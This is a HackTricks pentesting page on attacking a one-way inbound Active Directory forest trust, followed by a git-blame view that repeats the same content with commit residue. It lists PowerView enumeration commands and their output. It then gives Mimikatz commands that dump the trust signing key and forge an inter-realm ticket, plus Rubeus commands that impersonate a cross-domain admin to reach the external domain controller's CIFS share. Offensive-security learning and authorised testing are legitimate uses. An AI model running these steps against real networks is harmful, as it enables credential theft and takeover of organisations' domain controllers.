hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md

# External Forest Domain - OneWay (Inbound)

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

In this scenario an external domain is trusting you, so you can get some kind of access over it.

## Enumeration

First of all, you need to **enumerate** the **trust**:

```powershell
Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname           
-----------           
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
                          DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned 
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
```

In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.

## Impersonation

### With signing key

{% hint style="warning" %}
As a reminder, you can get the signing key with&#x20;

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
```
{% endhint %}

You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.

```bash
# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```

### Full way impersonating the user

```bash
# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
+								# External Forest Domain - OneWay (Inbound)
 								<details>
 								<summary><strong>Support HackTricks and get benefits!</strong></summary>
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
 								</details>
 								In this scenario an external domain is trusting you, so you can get some kind of access over it.
 								## Enumeration
 								First of all, you need to **enumerate** the **trust**:
 								```powershell
 								Get-DomainTrust
 								SourceName      : a.domain.local   --> Current domain
 								TargetName      : domain.external  --> Destination domain
 								TrustType       : WINDOWS-ACTIVE_DIRECTORY
 								TrustAttributes :
 								TrustDirection  : Inbound          --> Inboud trust
 								WhenCreated     : 2/19/2021 10:50:56 PM
 								WhenChanged     : 2/19/2021 10:50:56 PM
 								# Get name of DC of the other domain
 								Get-DomainComputer -Domain domain.external -Properties DNSHostName
 								dnshostname
 								-----------
 								dc.domain.external
 								# Groups that contain users outside of its domain and return its members
 								Get-DomainForeignGroupMember -Domain domain.external
 								GroupDomain             : domain.external
 								GroupName               : Administrators
 								GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
 								MemberDomain            : domain.external
 								MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
 								MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
 								                          DC=external
 								# Get name of the principal in the current domain member of the cross-domain group
 								ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
 								DEV\External Admins
 								# Get members of the cros-domain group
 								Get-DomainGroupMember -Identity "External Admins" | select MemberName
 								MemberName
 								----------
 								crossuser
 								# Lets list groups members
 								## Check how the "External Admins" is part of the Administrators group in that DC
 								Get-NetLocalGroupMember -ComputerName dc.domain.external
 								ComputerName : dc.domain.external
 								GroupName    : Administrators
 								MemberName   : SUB\External Admins
 								SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
 								IsGroup      : True
 								IsDomain     : True
 								# You may also enumerate where foreign groups and/or users have been assigned
 								# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
 								```
 								In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
 								## Impersonation
 								### With signing key
 								{% hint style="warning" %}
 								As a reminder, you can get the signing key with&#x20;
 								```powershell
 								Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
 								```
 								{% endhint %}
 								You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.
 								```bash
 								# Get a TGT for the cross-domain privileged user to the other domain
 								Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
 								# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
 								## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
 								Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
 								# Now you have a TGS to access the CIFS service of the domain controller
 								```
 								### Full way impersonating the user
 								```bash
 								# Get a TGT of the user with cross-domain permissions
 								Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
 								# Get a TGT from the current domain for the target domain for the user
 								Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
 								# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
 								## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
 								Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
 								# Now you have a TGS to access the CIFS service of the domain controller
 								```
 								<details>
 								<summary><strong>Support HackTricks and get benefits!</strong></summary>
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
-												change support text

											
										
										
											2022-09-09 11:28:04 +00:00
+								- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-												GitBook: [#3391] No subject

											
										
										
											2022-08-15 21:10:48 +00:00
 								</details>